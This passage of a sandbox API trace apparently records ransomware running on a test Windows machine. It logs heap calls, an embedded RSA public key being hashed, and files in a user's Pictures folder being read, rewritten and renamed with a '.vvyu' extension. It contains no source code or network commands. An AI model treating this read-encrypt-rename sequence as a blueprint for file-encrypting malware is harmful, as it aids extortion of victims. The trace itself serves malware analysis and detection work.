HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3348 | out: hHeap=0x2c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.656] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xd8fa, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xd8fa, lpOverlapped=0x0) returned 1 [0190.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.658] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd8ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.658] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.660] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.660] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.660] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.660] CloseHandle (hObject=0x584) returned 1 [0190.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.663] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\gO3R.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\go3r.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\gO3R.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\go3r.jpg.vvyu")) returned 1 [0190.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.669] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.672] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d3fc20, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0xa8919430, ftLastAccessTime.dwHighDateTime=0x1d8a743, ftLastWriteTime.dwLowDateTime=0xa8919430, ftLastWriteTime.dwHighDateTime=0x1d8a743, nFileSizeHigh=0x0, nFileSizeLow=0x9e0e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HPPn3l0IweJl.gif", cAlternateFileName="HPPN3L~1.GIF")) returned 1 [0190.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3348 [0190.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3348 | out: hHeap=0x2c0000) returned 1 [0190.672] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\HPPn3l0IweJl.gif") returned=".gif" [0190.672] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\HPPn3l0IweJl.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\hppn3l0iwejl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.673] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=40462) returned 1 [0190.673] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.676] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9de8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.676] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.682] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.682] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9e0e, lpOverlapped=0x0) returned 1 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.683] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.684] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.684] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.684] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.684] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.684] GetLastError () returned 0x0 [0190.684] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.684] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.685] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.685] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.685] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9e10) returned 0x2af5168 [0190.685] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3348 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3390 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.687] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5ed0 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0190.688] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.690] GetCurrentThreadId () returned 0x5d8 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5148 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.690] GetCurrentThreadId () returned 0x5d8 [0190.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.691] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ed0 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f00 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f30 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f30 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.694] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: 